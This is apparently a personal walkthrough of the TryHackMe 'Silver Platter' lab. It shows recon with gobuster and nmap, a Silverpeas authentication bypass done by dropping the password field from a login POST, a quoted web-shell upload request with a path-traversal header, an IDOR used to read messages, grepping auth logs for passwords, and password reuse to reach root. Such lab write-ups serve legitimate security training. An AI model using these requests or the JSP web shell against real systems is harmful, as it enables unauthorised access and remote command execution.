Silver Platter writeup

Recon

Today I will be working on the Silver Platter lab in THM.

Starting off, I am just going to look through the website to hopefully get some useful OSINT.

I see that there are 4 links on the homepage:

INTRO, WORK, ABOUT, CONTACT.

Looking through these, I didn’t see anything too useful until I read into the CONTACT page. It says:

If you'd like to get in touch with us, please reach out to our project manager on Silverpeas. His username is "scr1ptkiddy".

It looks like this username could be used for a brute-force attack, as this user claims to be a project manager. Hopefully they have escalated privs on this web server.

Following this I am going to try a basic brute force. One thing to remember is that this lab makes a note to tell you they have secured their accounts against rockyou.txt so for now I will avoid that list.

First I need to find a login page. I tried running some large directory lists through gobuster but only got the following:

gobuster dir --url 10.201.13.3 -w Documents/tools/lists/gobuster_dsstorewordlist.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.201.13.3
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                Documents/tools/lists/gobuster_dsstorewordlist.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/assets               (Status: 301) [Size: 178] [--> http://10.201.13.3/assets/]
/images               (Status: 301) [Size: 178] [--> http://10.201.13.3/images/]
/LICENSE.txt          (Status: 200) [Size: 17128]
/README.txt           (Status: 200) [Size: 771]
Progress: 1828 / 1829 (99.95%)
===============================================================
Finished
===============================================================

Now I am going to see if I can find more information on how this site is hosted; hopefully I can find some kind of login portal with some searches.

I run this NMAP scan to see if I can get any services:

nmap -sC -sV 10.201.13.3
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-25 15:38 EDT

While I was waiting for this scan to finish I noticed something interesting. The contact page also mentions a tools called “Silverpeas” which is some kind of open-source tool. Going to their website, I found a GitHub repo. Maybe I can find some more OSINT here.

While digging around Silverpeas, I found that there was an authentication bypass vulnerability. I think this is our way. in.

First I will take a look at this writeup: https://gist.github.com/ChrisPritchard/4b6d5c70d9329ef116266a6c238dcb2d

CVE: CVE-2024-36042

Initial Exploitation

Reading through this post, it appears that login credentials are sent through HTTP POST requests… (jesus…)

According to this PoC, all you need to do is pass a username field and a blank password, and you will be signed in.

Let’s attempt this with my POST tool, POSTmortem.

I will be attempting this request:

POST /silverpeas/AuthenticationServlet HTTP/2
Host: 212.129.58.88
Content-Length: 28
Origin: https://212.129.58.88
Content-Type: application/x-www-form-urlencoded

Login=SilverAdmin&DomainId=0

After looking through some documentation on the CVE and silverpeas I found a login portal at: http://hackersite.com:8080/silverpeas/defaultLogin.jsp

(ignore the DNS name it is mapped to the IP of the victims server)

This request did not seem to work so let’s try to modify the request through burpsuite.

Now I will attempt to intercept the login request and remove the password field.

I intercepted this POST request:

POST /silverpeas/AuthenticationServlet HTTP/1.1
Host: hackersite.com:8080
Content-Length: 49
Cache-Control: max-age=0
Accept-Language: en-US,en;q=0.9
Origin: http://hackersite.com:8080
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://hackersite.com:8080/silverpeas/defaultLogin.jsp
Accept-Encoding: gzip, deflate, br
Cookie: JSESSIONID=az7BzgSPx_DR_FsMeIRe2kmI30wL7ZiA7za1fFOU.ebabc79c6d2a
Connection: keep-alive

Login=SilverAdmin&Password=SilverAdmin&DomainId=0

Now I will remove the Password field

Login=SilverAdmin&DomainId=0

And boom. We have admin access. My first instinct is to try and find an RCE, and hopefully we can pop a reverse shell on the administrator user.

It appears a researcher from bishopfox found an RCE through the upload feature; here is the PoC they gave:

POST /silverpeas/services/fileUpload HTTP/1.1
Host: vulns.lan:8000
Content-Type: application/octet-stream
X-FULL-PATH: ../../web/weblib.war/Aurora/css/webshell.jsp
<%@ page import="java.io.*" %>
<%
 String cmd = request.getParameter("cmd");
 String output = "";
 if(cmd != null) {
    String s = null;
    try {
         Process p = Runtime.getRuntime().exec(cmd,null,null);
         BufferedReader sI = new BufferedReader(new
         InputStreamReader(p.getInputStream()));
         while((s = sI.readLine()) != null) { output += s+"\n"; }
      }  catch(IOException e) {   e.printStackTrace();        }
%>
<%=output %>

I will attempt to use this for exploitation in BurpSuite.

After over an hour of debugging, it seems like this exploit will not work. I discovered another CVE, which covered an IDOR attack that let you read other users’ messages.

Post Exploitation

silverpeas/RSILVERMAIL/jsp/ReadMessage.jsp?ID=[messageID]

After going through each message, I was able to find SSH creds, so let’s try to log in.

BOOM! After logging into Tims account, I found the user.txt flag. Now let’s find the root flag.

Looking through tim@ip-10-201-40-166:~$ cat /var/log/auth* | grep -i pass

I think I found a database cred; I will look around to see if I can find anything to log into the database.

Dec 13 15:40:33 silver-platter sudo:    tyler : TTY=tty1 ; PWD=/ ; USER=root ; COMMAND=/usr/bin/docker run --name postgresql -d -e POSTGRES_PASSWORD=_Zd_zx7N823/ -v postgresql-data:/var/lib/postgresql/data postgres:12.3
Dec 13 15:44:30 silver-platter sudo:    tyler : TTY=tty1 ; PWD=/ ; USER=root ; COMMAND=/usr/bin/docker run --name silverpeas -p 8080:8000 -d -e DB_NAME=Silverpeas -e DB_USER=silverpeas -e DB_PASSWORD=_Zd_zx7N823/ -v silverpeas-log:/opt/silverpeas/log -v silverpeas-data:/opt/silvepeas/data --link postgresql:database sivlerpeas:silverpeas-6.3.1
Dec 13 15:45:21 silver-platter sudo:    tyler : TTY=tty1 ; PWD=/ ; USER=root ; COMMAND=/usr/bin/docker run --name silverpeas -p 8080:8000 -d -e DB_NAME=Silverpeas -e DB_USER=silverpeas -e DB_PASSWORD=_Zd_zx7N823/ -v silverpeas-log:/opt/silverpeas/log -v silverpeas-data:/opt/silvepeas/data --link postgresql:database silverpeas:silverpeas-6.3.1
Dec 13 15:45:57 silver-platter sudo:    tyler : TTY=tty1 ; PWD=/ ; USER=root ; COMMAND=/usr/bin/docker run --name silverpeas -p 8080:8000 -d -e DB_NAME=Silverpeas -e DB_USER=silverpeas -e DB_PASSWORD=_Zd_zx7N823/ -v silverpeas-log:/opt/silverpeas/log -v silverpeas-data:/opt/silvepeas/data --link postgresql:database silverpeas:6.3.1

Running this command resulted in this output:

tim@ip-10-201-40-166:~$ /usr/bin/docker run --name silverpeas -p 8080:8000 -d -e DB_NAME=Silverpeas -e DB_USER=silverpeas -e DB_PASSWORD=_Zd_zx7N823/ -v silverpeas-log:/opt/silverpeas/log -v silverpeas-data:/opt/silvepeas/data --link postgresql:database silverpeas:6.3.1
docker: permission denied while trying to connect to the Docker daemon socket at unix:///var/run/docker.sock: Post "http://%2Fvar%2Frun%2Fdocker.sock/v1.24/containers/create?name=silverpeas": dial unix /var/run/docker.sock: connect: permission denied.
See 'docker run --help'.
tim@ip-10-201-40-166:~$

This did not work so then I tried this:

tim@ip-10-201-40-166:~$ su - tyler
Password:
tyler@ip-10-201-40-166:~$

And I am in.

Now that im in I ran “ls” and got no results, looks like its all dotfiles.

tyler@ip-10-201-40-166:~$ ls -la
total 36
drwxr-x--- 5 tyler tyler 4096 Dec 13  2023 .
drwxr-xr-x 6 root  root  4096 Jul 21 20:10 ..
-rw------- 1 tyler tyler   54 Dec 13  2023 .bash_history
-rw-r--r-- 1 tyler tyler  220 Jan  6  2022 .bash_logout
-rw-r--r-- 1 tyler tyler 3771 Jan  6  2022 .bashrc
drwx------ 2 tyler tyler 4096 Dec 12  2023 .cache
drwxrwxr-x 3 tyler tyler 4096 Dec 13  2023 .local
-rw-r--r-- 1 tyler tyler  807 Jan  6  2022 .profile
drwx------ 2 tyler tyler 4096 Dec 12  2023 .ssh
-rw-r--r-- 1 tyler tyler    0 Dec 12  2023 .sudo_as_admin_successful

I figured I could see where tyler has gone by checking their history:

tyler@ip-10-201-40-166:~$ history
  1  clear
  2  ls
  3  cd /home
  4  ls
  5  cd ..
  6  sudo passwd tim
  7  clear
  8  exit
  9  ls
 10  ls -la
 11  history

Lets see whats in their home folder

tyler@ip-10-201-40-166:~$ cd /home
tyler@ip-10-201-40-166:/home$ ls
ssm-user  tim  tyler  ubuntu
tyler@ip-10-201-40-166:/home$

It appears that Tyler has root access, so now all we need to do is run sudo su to get into root and cat root.txt. Boom, user and root pwned.``

Previous: Racecondition_Ctf